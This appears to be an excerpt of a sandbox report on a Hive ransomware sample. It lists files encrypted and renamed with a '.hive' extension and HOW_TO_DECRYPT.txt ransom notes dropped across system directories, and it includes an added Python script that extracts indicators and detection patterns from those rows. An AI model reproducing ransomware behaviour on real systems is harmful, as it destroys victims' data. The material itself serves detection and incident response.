File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL002.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONBttnPPT.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\202.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-60_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailSplashLogo.scale-250.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-hover_32.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\PREVIEW.GIF.P7EsMTWem2f4DapaPblE9BlnkxlS9YQllD3nUpaK9Eo.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\resources.pak.DATA.P7EsMTWem2f4DapaPblE9PSmXvAta_JqUP56tyeEGTo.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsMedTile.contrast-black_scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailSmallTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Security.SecureString.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\msipc.dll.mui.P7EsMTWem2f4DapaPblE9AuHrQaaDXlDVGqGIllTijo.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-namedpipe-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ar-ae\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ViewOnly_ZeroGrace-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GADUGIB.TTF.P7EsMTWem2f4DapaPblE9N9WkJwDaKIFhphO3V9SeQ4.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\zlibwapi.dll.P7EsMTWem2f4DapaPblE9FAK8e5LuWsFN3tP-2Rk0wc.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ro.pak.P7EsMTWem2f4DapaPblE9OxFCp75q308UWmFVzVcogg.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\NewNotePlaceholder-dark.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Subscription-ppd.xrm-ms.P7EsMTWem2f4DapaPblE9Iug6pFcybIlgFi-LU92Yhw.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Runtime.InteropServices.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-sl\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailLargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\proofing.msi.16.en-us.tree.dat.P7EsMTWem2f4DapaPblE9PELDBezftc1xes91Op6jBs.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right.gif.P7EsMTWem2f4DapaPblE9IPXwRs6EwMqDK5EsTxwVUA.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js.P7EsMTWem2f4DapaPblE9CEvoU-M2td-iXWpVvrfvGg.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\en-US\PackageManagementDscUtilities.strings.psd1.P7EsMTWem2f4DapaPblE9PZJe1ZgBUwtbzbv8rzUuBc.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Controls\EndOfLife\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteWideTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_hover_18.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_field_grabber.png.P7EsMTWem2f4DapaPblE9O_MlC_RsF44NXcIPKcbIwc.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_heb.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteSmallTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\IC_WelcomeBanner.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Text.Encodings.Web.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\decora_sse.dll.P7EsMTWem2f4DapaPblE9PD0BmXDN7JX9keKpkGeX1o.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-30_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MEIPreload\preloaded_data.pb.DATA.P7EsMTWem2f4DapaPblE9Ou3jzKHGGsk_4I_XnnhIEA.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_PrepidBypass-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_PigNose.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_ur.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans\PresentationFramework.resources.dll.P7EsMTWem2f4DapaPblE9DGMyl3gAfgbESWq6F7fSiQ.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\prism_common.dll.P7EsMTWem2f4DapaPblE9HXDaPkZ-gZv9DM0I8sk2xE.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.Preview.winmd C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
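
The tables in this section record the same two behaviours hundreds of times: a note named HOW_TO_DECRYPT.txt created in each directory the sample walks, and existing files opened for modification, many of them already renamed to <original name>.<43-character token>.hive, where every token in this run begins with P7EsMTWem2f4DapaPblE9. The script below is an added example, not code from the report or from the sandbox vendor: it parses rows in exactly the layout shown above (eight rows copied verbatim serve as constructed sample input), derives the ransom-note name, the encrypted-name pattern and the acting process, and applies a simple fan-out threshold so the same parser can be pointed at a different run. The row regex, the MIN_NOTE_DIRS threshold and every function name are this example's own assumptions.

```python
"""Pull ransomware IOCs out of sandbox "Drops file in ..." rows.

Added example, not code from the original report or from the sandbox vendor.
The sample rows are copied from the tables above; the row regex, the
directory threshold and every function name are this example's own
assumptions about how to read that layout.
"""
import os
import re
from collections import Counter, defaultdict
from pathlib import PureWindowsPath

# Row layout in the report: "<Description> <Indicator> <Process> <Target>".
# The indicator path may contain spaces ("Program Files (x86)"), while the
# process path is a single token ending in .exe and the target is "N/A", so
# the indicator is matched lazily up to the process token (assumption).
ROW_RE = re.compile(
    r"^(?P<description>File created|File opened for modification) "
    r"(?P<indicator>.+?) "
    r"(?P<process>\S+\.exe) "
    r"(?P<target>\S+)$"
)

# Encrypted-file name as it appears in this run: original name, a dot, a
# 43-character base64url token (the length of 32 unpadded bytes) and ".hive".
HIVE_NAME_RE = re.compile(r"\.(?P<token>[A-Za-z0-9_-]{43})\.hive$")

# A created file that shows up in at least this many distinct directories
# is treated as a ransom note (threshold chosen for this small excerpt).
MIN_NOTE_DIRS = 3

# Constructed input: eight rows copied verbatim from the report tables.
SAMPLE_ROWS = r"""
File created C:\Windows\SysWOW64\Speech\SpeechUX\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\drivers\W32X86\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms.P7EsMTWem2f4DapaPblE9JLMqb0GT-MsqSXfDBplsgc.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ro.pak.P7EsMTWem2f4DapaPblE9OxFCp75q308UWmFVzVcogg.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-namedpipe-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GADUGIB.TTF.P7EsMTWem2f4DapaPblE9N9WkJwDaKIFhphO3V9SeQ4.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\x86_system.printing_31bf3856ad364e35_10.0.19041.1_none_cd12d4bd5d1c62ec\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
"""


def parse_rows(text):
    """Return one dict per row that matches the report layout; skip the rest."""
    events = []
    for line in text.splitlines():
        match = ROW_RE.match(line.strip())
        if match:
            events.append(match.groupdict())
    return events


def summarize(events, min_note_dirs=MIN_NOTE_DIRS):
    """Derive the IOCs a responder wants: note name, encrypted-name pattern, actor process."""
    note_dirs = defaultdict(set)   # created filename -> directories it landed in
    tokens = []                    # per-file tokens taken from encrypted names
    processes = Counter()
    for ev in events:
        path = PureWindowsPath(ev["indicator"])
        processes[ev["process"]] += 1
        if ev["description"] == "File created":
            note_dirs[path.name].add(str(path.parent))
        match = HIVE_NAME_RE.search(path.name)
        if match:
            tokens.append(match.group("token"))
    ransom_notes = {
        name: len(dirs) for name, dirs in note_dirs.items() if len(dirs) >= min_note_dirs
    }
    return {
        "ransom_notes": ransom_notes,
        "encrypted_count": len(tokens),
        # Leading characters shared by every per-file token in this run ("" if none).
        "token_common_prefix": os.path.commonprefix(tokens),
        "processes": dict(processes),
        # Filesystem hunt patterns derived from the rows themselves.
        "hunt_patterns": sorted(ransom_notes) + (["*.hive"] if tokens else []),
    }


def is_ransomware_run(summary):
    """Flag the run when a note fanned out across directories and files were renamed."""
    return bool(summary["ransom_notes"]) and summary["encrypted_count"] > 0


if __name__ == "__main__":
    result = summarize(parse_rows(SAMPLE_ROWS))
    for key, value in result.items():
        print(f"{key}: {value}")
    print("ransomware behaviour:", is_ransomware_run(result))
```

The 43-character token is read here only as an observed filename property (43 unpadded base64url characters encode 32 bytes); the script derives the shared prefix from the data rather than hard-coding it. A row whose indicator has not yet been renamed (the .dll in the sample) is counted as touched by the process but not as encrypted, which is why the encrypted count is lower than the number of modification rows, and why the fan-out of the note across distinct directories is the more robust of the two signals for an early detection.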

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..lowbroker.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_521d56dcb4ef479b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-hlink_31bf3856ad364e35_10.0.19041.1237_none_d6d991394db08f86\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-m..ac-ado-ddl-security_31bf3856ad364e35_10.0.19041.264_none_9a64e210d3a49e6c\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-dafwfdprovider_31bf3856ad364e35_10.0.19041.1_none_b058c457605b2980\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-k..l-pnp-adm.resources_31bf3856ad364e35_10.0.19041.1_it-it_e961f8e21ea93e0a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-m..mentmanifests-shell_31bf3856ad364e35_10.0.19041.423_none_9e37e96dfd85e9b1\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-mapcontrol-desktop_31bf3856ad364e35_10.0.19041.746_none_2999d52b8db06219\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_windows-id-connecte..nt-provider-activex_31bf3856ad364e35_10.0.19041.1_none_211e6839b16031fe\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-n..rity-domain-clients_31bf3856ad364e35_10.0.19041.1_none_db2033aec5f4055d\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-i..l-keyboard-0000044b_31bf3856ad364e35_10.0.19041.1_none_b2edb67cf59d8460\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-ie-setup.resources_31bf3856ad364e35_11.0.19041.1_uk-ua_651962b808b5b764\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-certutil.resources_31bf3856ad364e35_10.0.19041.1_es-es_85df3743bdb65309\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-explorer.resources_31bf3856ad364e35_10.0.19041.1023_en-us_7aca3dab28c636fc\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\x86_system.printing_31bf3856ad364e35_10.0.19041.1_none_cd12d4bd5d1c62ec\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-mdm-adm_31bf3856ad364e35_10.0.19041.1_none_afd04b8235cdb4f2\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.ServiceModel.Resources\3.0.0.0_it_b77a5c561934e089\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_hyperv-commandline-tool_31bf3856ad364e35_10.0.19041.928_none_0b17415ae0dd0379\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\x86_microsoft-windows-i..o4-codecs.resources_31bf3856ad364e35_10.0.19041.1_en-us_57d193173da3f87b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-onecore-c..clientapi.resources_31bf3856ad364e35_10.0.19041.1_de-de_9b306a53cd56cfa2\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-devices-wifidirect_31bf3856ad364e35_10.0.19041.264_none_7507f2201fb551a4\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\msil_system.serviceprocess.resources_b03f5f7f11d50a3a_10.0.19041.1_it-it_ae68d65583e97eab\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\msil_microsoft.powershell.security.resources_31bf3856ad364e35_1.0.0.0_ja-jp_81063264f1136d5e\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_windows-media-speech-winrt_31bf3856ad364e35_10.0.19041.264_none_fbb15bbadd313556\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-b..roxy-main.resources_31bf3856ad364e35_10.0.19041.1_en-us_3813956db567ed0e\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..agement-omadmclient_31bf3856ad364e35_10.0.19041.1151_none_c86feb6936a97173\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig.resources\v4.0_4.0.0.0_es_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-n..pprovider.resources_31bf3856ad364e35_10.0.19041.1_es-es_41e0d1946a7c5321\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\msil_system.messaging.resources_b03f5f7f11d50a3a_10.0.19041.1_de-de_917d3b2b93fb8e53\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
